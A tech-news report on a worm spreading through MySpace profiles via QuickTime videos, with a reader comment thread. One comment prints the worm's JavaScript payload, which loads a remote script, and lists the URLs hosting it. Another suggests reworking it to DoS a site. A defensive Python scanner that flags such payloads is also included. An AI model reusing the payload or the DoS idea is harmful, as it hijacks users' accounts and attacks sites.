New MySpace Exploit

Thanks to kaneso on the forums for the heads-up.

A suspicious .mov QuickTime video has been appearing on profiles and autoplays. As soon as the video plays, it adds itself to the viewing user's own MySpace profile, which is why it is spreading so quickly.

We encourage Neowin users to report this site, so that IE7 users with the phishing filter's automatic updates turned on will at least be warned that it is a fake site.

View: Report Fake Website
View: MySpace Exploit - Neowin Forums


17 Comments


Well, it looks like you can change the script location within the mov to point anywhere within an image folder on a webserver. The script that it points to within the mov file does two things: 1. tries to change the profile and 2. sends random mail with your account. I've been playing with it and it could easily be re-released against the spam; with some tweaking it could be used to send requests to the spammer site to DOS it.

The exploit could pick on any website with a "remember who I am" feature. It seems it only requires that you have a current cookie keeping you logged in. I also do not see how DropMyRights would solve anything at all. I should of course test, but I am pretty sure this could have been done without the mov and from just about any website.

I use DropMyRights so I browse without fear on my XP.
For Vista, DropMyRights is built-in (with additional features).

This site can do nothing to my machine.
Be it a Quicktime exploit or a Java exploit I am safe.

The mov file has javascript embedded in it.

The code inside is:
A<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>


The actual code that does the altering of the MySpace profile is of course here:
http://www.cake.fi/images/js.js

The movie is hosted at:
http://www.cake.fi/images/piAF2iuswo.mov
http://almobty.com/css/piAF2iuswo.mov

And random stuff to waste some more lunchtime:
http://www.cake.fi/
http://dotnetsql.com/

Perhaps ring All-solution (http://www.all-solution.com/) and tell them they are hosting the almobty site (it is one of their "1000+ customers"), but perhaps they already know. It is apparently a Saudi Arabian company, yet hosted in San Diego by http://www.aplus.net/
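
As an added example (not code from the article or from the comment above), the following Python scanner shows how the payload described in that comment can be picked out of a .mov file: it walks the QuickTime atom tree, notes whether the movie carries a text-handler track, and flags any HREF-track URL in the media data whose scheme is javascript:, vbscript: or data:. The minimal .mov it builds and the attacker.invalid hostname are constructed for the demonstration; the payload string only mirrors the shape of the one quoted above.

```python
"""Scan a QuickTime .mov for an HREF text track whose URL uses a script scheme.

Constructed example: the sample files built below are synthetic and the attacker
hostname is a placeholder; nothing here is taken from the worm's real files.
"""
import re
import struct

# Atom types that only wrap other atoms; everything else is treated as a leaf.
CONTAINER_ATOMS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"udta", b"edts", b"dinf"}

# HREF-track syntax: "A<url>" auto-loads the URL when the sample plays, "T<frame>" names
# the target. Whitespace inside the scheme is tolerated by the pattern and stripped later,
# so a split scheme is still classified instead of passing as a harmless unknown one.
HREF_RE = re.compile(rb"A<\s*([A-Za-z][A-Za-z0-9+.\s-]*?):")
SCRIPT_SCHEMES = {b"javascript", b"vbscript", b"data"}


def iter_atoms(buf, start, end):
    """Yield (type, payload_start, payload_end) for each atom in buf[start:end]."""
    pos = start
    while pos + 8 <= end:
        size, atype = struct.unpack(">I4s", buf[pos:pos + 8])
        header = 8
        if size == 1:                       # 64-bit extended size follows the type
            if pos + 16 > end:
                return
            size = struct.unpack(">Q", buf[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:                     # atom runs to the end of the enclosing range
            size = end - pos
        if size < header or pos + size > end:
            return                          # truncated or lying size field: stop, never loop
        yield atype, pos + header, pos + size
        pos += size


def collect(buf, start, end, out):
    """Recursive walk: record media handler subtypes and the byte ranges of mdat atoms."""
    for atype, pstart, pend in iter_atoms(buf, start, end):
        if atype in CONTAINER_ATOMS:
            collect(buf, pstart, pend, out)
        elif atype == b"hdlr" and pend - pstart >= 12:
            # hdlr payload: version/flags (4), component type (4), component subtype (4)
            out["handlers"].append(buf[pstart + 8:pstart + 12].decode("latin-1"))
        elif atype == b"mdat":
            out["mdat"].append((pstart, pend))


def analyze_mov(buf):
    """Return handler info plus every HREF-style URL in the media data, flagged by scheme."""
    out = {"handlers": [], "mdat": []}
    collect(buf, 0, len(buf), out)
    hrefs = []
    for s, e in out["mdat"]:
        for m in HREF_RE.finditer(buf, s, e):
            scheme = re.sub(rb"\s+", b"", m.group(1)).lower()
            close = buf.find(b">", m.end(), e)          # URL ends at the closing '>'
            url = buf[m.start() + 2:close if close != -1 else e]
            hrefs.append({
                "scheme": scheme.decode("ascii"),
                "url": url.decode("latin-1", "replace").strip(),
                "script": scheme in SCRIPT_SCHEMES,
            })
    return {
        "has_text_track": "text" in out["handlers"],
        "href_tracks": hrefs,
        "suspicious": any(h["script"] for h in hrefs),
    }


def atom(atype, payload):
    return struct.pack(">I4s", 8 + len(payload), atype) + payload


def build_sample_mov(href_payload):
    """Constructed minimal .mov: ftyp, a moov with one text-handler track, and an mdat
    holding a single text sample (2-byte big-endian length + text) carrying the HREF."""
    ftyp = atom(b"ftyp", b"qt  " + struct.pack(">I", 0x20050300) + b"qt  ")
    hdlr = atom(b"hdlr", b"\x00" * 4 + b"mhlr" + b"text" + b"\x00" * 12)
    moov = atom(b"moov", atom(b"trak", atom(b"mdia", hdlr)))
    mdat = atom(b"mdat", struct.pack(">H", len(href_payload)) + href_payload)
    return ftyp + moov + mdat


# Same shape as the payload quoted in the comment; the hostname is a placeholder.
WORM_HREF = (b"A<javascript:void((function(){var e=window.document.createElement('script');"
             b"e.setAttribute('src','http://attacker.invalid/images/js.js');"
             b"window.document.body.appendChild(e);})());> T<>")
BENIGN_HREF = b"A<http://example.invalid/trailer> T<_blank>"

if __name__ == "__main__":
    for label, href in (("worm-style", WORM_HREF), ("benign", BENIGN_HREF)):
        print(label, analyze_mov(build_sample_mov(href)))
```

The scanner deliberately searches all of mdat rather than following the sample table (stbl) offsets to the text track's chunks, which keeps it short and errs on the side of flagging; a production checker would resolve the offsets so that an HREF string inside a video frame is not reported. Stopping on a bad size field matters in practice, since a crafted atom with size 0 or an oversized length is a classic way to stall or crash a naive parser.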

Quote - FrozenSpoon said @ #2
I don't know about anyone else, but I avoid Quicktime like the plague. Thing still doesn't VSync videos on my computer.

I don't know about anyone else, but I avoid MySpace like the plague. True, I should support it, since it's owned by Fox News' parent company, but I knew from day 1 that the level of user freedom (with regard to customization) on MySpace would be dangerous... I mean, even if it weren't dangerous... it's just plain irritating...

Nothing like trying to read someone's profile when it has a white background, yellow BlInKiNg text, and 5 embedded videos that autoplay when the page loads, along with whatever stupid music the person decided to lace their profile with...

Quote - kokoloko2k3 said @ #2.2

I don't know about anyone else, but I avoid MySpace like the plague. True, I should support it, since it's owned by Fox News' parent company, but I knew from day 1 that the level of user freedom (with regard to customization) on MySpace would be dangerous... I mean, even if it weren't dangerous... it's just plain irritating...

Nothing like trying to read someone's profile when it has a white background, yellow BlInKiNg text, and 5 embedded videos that autoplay when the page loads, along with whatever stupid music the person decided to lace their profile with...

Sounds more like your problem isn't so much with Myspace, but with the fact that you're trying to view pages done by immature people with no style or sense of aesthetics. Who's to blame again? I don't say my tv sucks because I'm too lazy to change the channel...

Quote - kokoloko2k3 said @ #2.2

I don't know about anyone else, but I avoid MySpace like the plague. True, I should support it, since it's owned by Fox News' parent company, but I knew from day 1 that the level of user freedom (with regard to customization) on MySpace would be dangerous... I mean, even if it weren't dangerous... it's just plain irritating...

Nothing like trying to read someone's profile when it has a white background, yellow BlInKiNg text, and 5 embedded videos that autoplay when the page loads, along with whatever stupid music the person decided to lace their profile with...

OK, same goes for Windows Live Spaces, Yahoo 360 and all the other social networking sites. The problem with those profiles is the kids do that to "act" cool when in reality they aren't. With mine, I try my best to include a theme, background, text etc. so it will all flow together, but still keep it in the "myspace theme". I'd show you mine, but it's set to private due to idiots at school giving me ****....

And as for it being dangerous, it will only become that if you make it become that. If you just talk to your friends and don't accept requests from strangers, then it will be fine. That's the thing with people: they think MySpace is all dangerous, but it will only become that if you make it come to that.

Quote - Tech_Dude_5000 said @ #2.4

OK, same goes for Windows Live Spaces, Yahoo 360 and all the other social networking sites. The problem with those profiles is the kids do that to "act" cool when in reality they aren't. With mine, I try my best to include a theme, background, text etc. so it will all flow together, but still keep it in the "myspace theme". I'd show you mine, but it's set to private due to idiots at school giving me ****....

Well, one social networking site not plagued by the problem I point out is Facebook. I really appreciate the fact that the whole site looks uniform. The problem is not users like you or me. The problem is users like our non-tech friends who have no sense for site design whatsoever... (My sense for site design isn't that good, but at least I know what looks bad